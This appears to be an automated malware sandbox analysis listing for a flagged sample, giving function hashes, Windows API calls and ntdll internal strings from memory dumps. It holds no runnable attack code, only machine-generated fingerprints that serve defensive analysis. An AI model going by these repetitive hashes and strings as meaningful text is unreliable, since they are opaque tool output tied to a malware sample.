                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 313a643b4c42a28d6e06bf89c0727852f810f27002c42073be410b2d913571a4
                                                                                                                      • Instruction ID: bd67403fd2a9d8978e2d513cbd646b4da8cf7a7493590f644cfc29f5637ae1cf
                                                                                                                      • Opcode Fuzzy Hash: 313a643b4c42a28d6e06bf89c0727852f810f27002c42073be410b2d913571a4
                                                                                                                      • Instruction Fuzzy Hash: C990023120140513D11171584504707401997E4241F95C513B0428559DD7668A53B221
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: c14c144671b0669951149e36eb0afbb3db3561cd80e68c3629a22689d69b2d4c
                                                                                                                      • Instruction ID: a352bec93e72211b6d0601dad0f5d69ce4cc3f8eddda477f3779edef906361a8
                                                                                                                      • Opcode Fuzzy Hash: c14c144671b0669951149e36eb0afbb3db3561cd80e68c3629a22689d69b2d4c
                                                                                                                      • Instruction Fuzzy Hash: 8390023120148902D1107158840474A401597E4301F59C512B4428659DC7A589927221
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: aa9a8e4d05ba4f1241fff7493566014b474cf63ddd47ce1ab3194bd76b001fc2
                                                                                                                      • Instruction ID: e48cc2267a0c4edd9f0ac3402002e21ddad27a4ab04effca0472b47c560b2d33
                                                                                                                      • Opcode Fuzzy Hash: aa9a8e4d05ba4f1241fff7493566014b474cf63ddd47ce1ab3194bd76b001fc2
                                                                                                                      • Instruction Fuzzy Hash: 0A90023160550502D10071584514706501597E4201F65C512B0428569DC7A58A5276A2

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(u235K44,00000111,00000000,00000000), ref: 00413F6A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_SW_48912.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: u235K44$u235K44
                                                                                                                      • API String ID: 1836367815-887001147
                                                                                                                      • Opcode ID: c9eb5df96e2f0bd96265019e1d5fa2bdfef285177db49589759599aa2393896e
                                                                                                                      • Instruction ID: 27c3d0d9d83f355a6b7f16d1443714ba523b8611c8eb3533a7d20312a9691806
                                                                                                                      • Opcode Fuzzy Hash: c9eb5df96e2f0bd96265019e1d5fa2bdfef285177db49589759599aa2393896e
                                                                                                                      • Instruction Fuzzy Hash: F8110C72D4021C7EDB109AE69C81DEF7B7CDF41798F448069F904B7241D67C4E0647A6

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(u235K44,00000111,00000000,00000000), ref: 00413F6A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_SW_48912.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: u235K44$u235K44
                                                                                                                      • API String ID: 1836367815-887001147
                                                                                                                      • Opcode ID: 134d3b73d867660f3c76aa4594cea828aa13d5025f13d4cfc044d6451923f2c5
                                                                                                                      • Instruction ID: f0c038a495d0d9d9337380d7088d780e69d95496bfea66c58b45b8b9ba8e4ff5
                                                                                                                      • Opcode Fuzzy Hash: 134d3b73d867660f3c76aa4594cea828aa13d5025f13d4cfc044d6451923f2c5
                                                                                                                      • Instruction Fuzzy Hash: 6E012672E4021C7ADB00AAE68C82DEF7B7CDF41798F448029FA04B7241D6784E068BB5

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417725
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_SW_48912.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      • Opcode ID: cc9a0ee59fc0f425b1dea6033d3a6057e6ce4d5b60ccdda23339aebc599060a3
                                                                                                                      • Instruction ID: be8895f1112ed76155a28bbeeebdaff540bdea10eb797164b7d23afff38fba94
                                                                                                                      • Opcode Fuzzy Hash: cc9a0ee59fc0f425b1dea6033d3a6057e6ce4d5b60ccdda23339aebc599060a3
                                                                                                                      • Instruction Fuzzy Hash: B1217871D0C1465FDB10DB689C91BEEBBB5DF51218F0800DBE8988B242E936DA48C715

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 236 42c853-42c897 call 4047d3 call 42d793 RtlAllocateHeap
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(?,0041E42E,?,?,00000000,?,0041E42E,?,?,?), ref: 0042C892
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_SW_48912.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: b73f5855ba8e18057ba849c7c3da7b6c9aacfe489b09c0c2e6e5cb3285ac220c
                                                                                                                      • Instruction ID: 8a41ba94fba150c4a7d0c6f4774c88b0e23220638a1fb62e529ffdb8faeb0955
                                                                                                                      • Opcode Fuzzy Hash: b73f5855ba8e18057ba849c7c3da7b6c9aacfe489b09c0c2e6e5cb3285ac220c
                                                                                                                      • Instruction Fuzzy Hash: 76E06D72604308BBD610EE59EC41EAB37ADEFC9710F004419FA09A7242C670B91087B9

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 241 42c8a3-42c8e4 call 4047d3 call 42d793 RtlFreeHeap
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F84589F4,00000007,00000000,00000004,00000000,00416F25,000000F4), ref: 0042C8DF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_SW_48912.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: 14c63d24e0aa0e9cc3c0093f06c20af4ee7af7e906eb0dad54e3e8771c8b5368
                                                                                                                      • Instruction ID: 0a30bab6d55ad135eeed097a5d6790394392834d135802c008717084d5b70ca7
                                                                                                                      • Opcode Fuzzy Hash: 14c63d24e0aa0e9cc3c0093f06c20af4ee7af7e906eb0dad54e3e8771c8b5368
                                                                                                                      • Instruction Fuzzy Hash: 99E06DB6200204BBD614EE59DC41FAB33ADEFC9714F00041AFA08A7241D774B9108AB9

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 405 42c8f3-42c92c call 4047d3 call 42d793 ExitProcess
                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,34EED896,?,?,34EED896), ref: 0042C927
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_SW_48912.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: 7569b89ab91bf1aeb1bea4a51f14b39ee0c427051f7aea902373c5cb946b96bc
                                                                                                                      • Instruction ID: 9eece9e5545b71105f86df05dc2022988576f706cbbce76d3d5f96f774a0597d
                                                                                                                      • Opcode Fuzzy Hash: 7569b89ab91bf1aeb1bea4a51f14b39ee0c427051f7aea902373c5cb946b96bc
                                                                                                                      • Instruction Fuzzy Hash: 9CE08C362106147BD620FA5AEC81FDBB76DEFC5724F00442AFA08A7281C7B4B91087F5

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 410 1422c0a-1422c0f 411 1422c11-1422c18 410->411 412 1422c1f-1422c26 LdrInitializeThunk 410->412
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 244ceb41d760cfecd9cf04005f88ad64321317489b22aa31ed4d3a9d0c189b69
                                                                                                                      • Instruction ID: 81534222751e34b2d4763277e5f85b8a3a0cedf6141eb2e07a15a73a542339be
                                                                                                                      • Opcode Fuzzy Hash: 244ceb41d760cfecd9cf04005f88ad64321317489b22aa31ed4d3a9d0c189b69
                                                                                                                      • Instruction Fuzzy Hash: 76B09B719015D5C5DA11F7644608B17791077D0701F55C163E3034753F4778C1D1F275
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2160512332
                                                                                                                      • Opcode ID: 190219bc3a91ebad2a31e067d88fea31c1ee49e5ae9feed9210c64bcbdba344a
                                                                                                                      • Instruction ID: 58e4187218a43c17be614cb6dfeeea30f44483db6b213f140d1cb1b7131ce367
                                                                                                                      • Opcode Fuzzy Hash: 190219bc3a91ebad2a31e067d88fea31c1ee49e5ae9feed9210c64bcbdba344a
                                                                                                                      • Instruction Fuzzy Hash: 4E926C71604342ABE721DF19C880F6BBBE8BB94758F04492EFA9497361D7B0E845CB53
                                                                                                                      Strings
                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014554E2
                                                                                                                      • Critical section address, xrefs: 01455425, 014554BC, 01455534
                                                                                                                      • double initialized or corrupted critical section, xrefs: 01455508
                                                                                                                      • corrupted critical section, xrefs: 014554C2
                                                                                                                      • Critical section address., xrefs: 01455502
                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01455543
                                                                                                                      • Thread identifier, xrefs: 0145553A
                                                                                                                      • Critical section debug info address, xrefs: 0145541F, 0145552E
                                                                                                                      • Address of the debug info found in the active list., xrefs: 014554AE, 014554FA
                                                                                                                      • 8, xrefs: 014552E3
                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014554CE
                                                                                                                      • Invalid debug info address of this critical section, xrefs: 014554B6
                                                                                                                      • undeleted critical section in freed memory, xrefs: 0145542B
                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0145540A, 01455496, 01455519
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                      • API String ID: 0-2368682639
                                                                                                                      • Opcode ID: da6a48afc59ccdc8e9fc3779d67978c4d9574f344743af50f313b612091f6e67
                                                                                                                      • Instruction ID: e0c9d8dbba7038f4d17e5e0f9b6dc3bceae00e824c05eb7f7846b1896df60199
                                                                                                                      • Opcode Fuzzy Hash: da6a48afc59ccdc8e9fc3779d67978c4d9574f344743af50f313b612091f6e67
                                                                                                                      • Instruction Fuzzy Hash: 5181AFB1A41359EFDB60CF99C844BAEBBB5BB08B18F10415EF908BB361D375A941CB50
                                                                                                                      Strings
                                                                                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014522E4
                                                                                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01452409
                                                                                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01452624
                                                                                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01452506
                                                                                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014524C0
                                                                                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01452498
                                                                                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01452602
                                                                                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01452412
                                                                                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0145261F
                                                                                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014525EB
                                                                                                                      • @, xrefs: 0145259B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                      • API String ID: 0-4009184096
                                                                                                                      • Opcode ID: 72db42c61604017a6c4812ee22af042e00309ddeede0fc0fd3f8ecf8e2496d3a
                                                                                                                      • Instruction ID: 3a0ea6c359e2ceff1197b930ca7c777fb36866527d188f90df639f81dde1f8f4
                                                                                                                      • Opcode Fuzzy Hash: 72db42c61604017a6c4812ee22af042e00309ddeede0fc0fd3f8ecf8e2496d3a
                                                                                                                      • Instruction Fuzzy Hash: C40282B1D002299BDB61DB55CC80F9AB7B8AB54304F0041EBEB09A7252E7B09F85CF59
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                      • API String ID: 0-2515994595
                                                                                                                      • Opcode ID: 1e52e8241b0d6d86c41baa699e2ad07a210da41a9f6484381cbb21f5bdb4c4ad
                                                                                                                      • Instruction ID: 5293308b67d2931b799d69dbc755dba80cf9b7b21fa73d85ee94c079cc6280cb
                                                                                                                      • Opcode Fuzzy Hash: 1e52e8241b0d6d86c41baa699e2ad07a210da41a9f6484381cbb21f5bdb4c4ad
                                                                                                                      • Instruction Fuzzy Hash: 6B51CF755043129BC325EF198884BAFBBE8FFD4344F94491EEA58C32A4E770D609C792
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                      • API String ID: 0-1700792311
                                                                                                                      • Opcode ID: eff6c32735c578fd7355e10d556945a88082690db752ae8f0c3e11d0e5122b0f
                                                                                                                      • Instruction ID: 6811c3f5609f7d17d0254052a6c2569c9ddcb2310bd4931e0b4795c424f97b28
                                                                                                                      • Opcode Fuzzy Hash: eff6c32735c578fd7355e10d556945a88082690db752ae8f0c3e11d0e5122b0f
                                                                                                                      • Instruction Fuzzy Hash: 9FD1EA32601282DFDF22DF68D440AAEBFF5FF5A718F09805AE5499B762C7349981CB50
                                                                                                                      Strings
                                                                                                                      • VerifierFlags, xrefs: 01468C50
                                                                                                                      • VerifierDlls, xrefs: 01468CBD
                                                                                                                      • VerifierDebug, xrefs: 01468CA5
                                                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01468A67
                                                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 01468B8F
                                                                                                                      • HandleTraces, xrefs: 01468C8F
                                                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01468A3D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                      • API String ID: 0-3223716464
                                                                                                                      • Opcode ID: 9336bde297e7afa679c770457d5c1b4b8ae36c033a4538f23f0284bb1abf19f1
                                                                                                                      • Instruction ID: 5b709e60df679f665eb67613b90815c22a17c3013aa3fae5ad0c5556bd9e0f7c
                                                                                                                      • Opcode Fuzzy Hash: 9336bde297e7afa679c770457d5c1b4b8ae36c033a4538f23f0284bb1abf19f1
                                                                                                                      • Instruction Fuzzy Hash: B891F3726417139FDB21DF69D890B5B77A8AB64A1CF05041EFA40AF374CB709C058BA3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                      • API String ID: 0-1109411897
                                                                                                                      • Opcode ID: 022b93922ff1923440ffc426dd9234e20cf673b45d46c9758c1fe85c41df126e
                                                                                                                      • Instruction ID: 57836b10ade8f7818a911babbaa9c5e7d1b8abf1fba0723f17e7b2059541d7f5
                                                                                                                      • Opcode Fuzzy Hash: 022b93922ff1923440ffc426dd9234e20cf673b45d46c9758c1fe85c41df126e
                                                                                                                      • Instruction Fuzzy Hash: AFA24D74A056298FEF64DF18CC987A9BBB5AF45304F1442EAD50DA73A0DB749E85CF00
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-792281065
                                                                                                                      • Opcode ID: e0cee76ec73d74398c63cccc9d53890efe5a84335255c945bc384c5a45dbbcd4
                                                                                                                      • Instruction ID: 64862e2558e9dd10e35b05ee5d36dc37337eb2fff7d0eb7fbb284acccd262a1f
                                                                                                                      • Opcode Fuzzy Hash: e0cee76ec73d74398c63cccc9d53890efe5a84335255c945bc384c5a45dbbcd4
                                                                                                                      • Instruction Fuzzy Hash: E1915770B413219BDB35DF19D845BAB7BB1AB10B58F05402FE9006F7B6E7B09882C795
                                                                                                                      Strings
                                                                                                                      • apphelp.dll, xrefs: 013D6496
                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01439A2A
                                                                                                                      • LdrpInitShimEngine, xrefs: 014399F4, 01439A07, 01439A30
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01439A11, 01439A3A
                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01439A01
                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014399ED
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-204845295
                                                                                                                      • Opcode ID: c0db3d60af01e9026374ee280320d9c0b8b5fec6d201bad05287fb62116de70c
                                                                                                                      • Instruction ID: cee57c25e1d132e16a6df3de4bcea69081bf3bc2372d1b7e006bf43265cc8cf2
                                                                                                                      • Opcode Fuzzy Hash: c0db3d60af01e9026374ee280320d9c0b8b5fec6d201bad05287fb62116de70c
                                                                                                                      • Instruction Fuzzy Hash: E65106B12083059FE724EF29D842B5B77E8FB88B48F00491EF59597270DB70E945CB92
                                                                                                                      Strings
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01452178
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014521BF
                                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0145219F
                                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 01452160, 0145219A, 014521BA
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 01452165
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01452180
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                      • API String ID: 0-861424205
                                                                                                                      • Opcode ID: b7bf5ee292f1b2fc44b6f33e3d500648b0e42252daf7c175d81722b77e7abfa9
                                                                                                                      • Instruction ID: 367ca2381762906f09f705b461a298586d103ea5b2261915af5a22112a3a0d96
                                                                                                                      • Opcode Fuzzy Hash: b7bf5ee292f1b2fc44b6f33e3d500648b0e42252daf7c175d81722b77e7abfa9
                                                                                                                      • Instruction Fuzzy Hash: 8631063AB40215B7E7218A9B9C41F5B7B68DB64A54F15005FFF04AB365D2B09E01CBA1
                                                                                                                      Strings
                                                                                                                      • LdrpInitializeProcess, xrefs: 0141C6C4
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01458181, 014581F5
                                                                                                                      • LdrpInitializeImportRedirection, xrefs: 01458177, 014581EB
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0141C6C3
                                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 014581E5
                                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 01458170
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                      • API String ID: 0-475462383
                                                                                                                      • Opcode ID: 08a47a776e919a84e9ed39ecdaf4b7f6bca1f4eb22574512b84598acc1028b5e
                                                                                                                      • Instruction ID: 3f320f7795ecb03903fd21dd6ea592019c42e9dc0438123b9312dfca1fa32843
                                                                                                                      • Opcode Fuzzy Hash: 08a47a776e919a84e9ed39ecdaf4b7f6bca1f4eb22574512b84598acc1028b5e
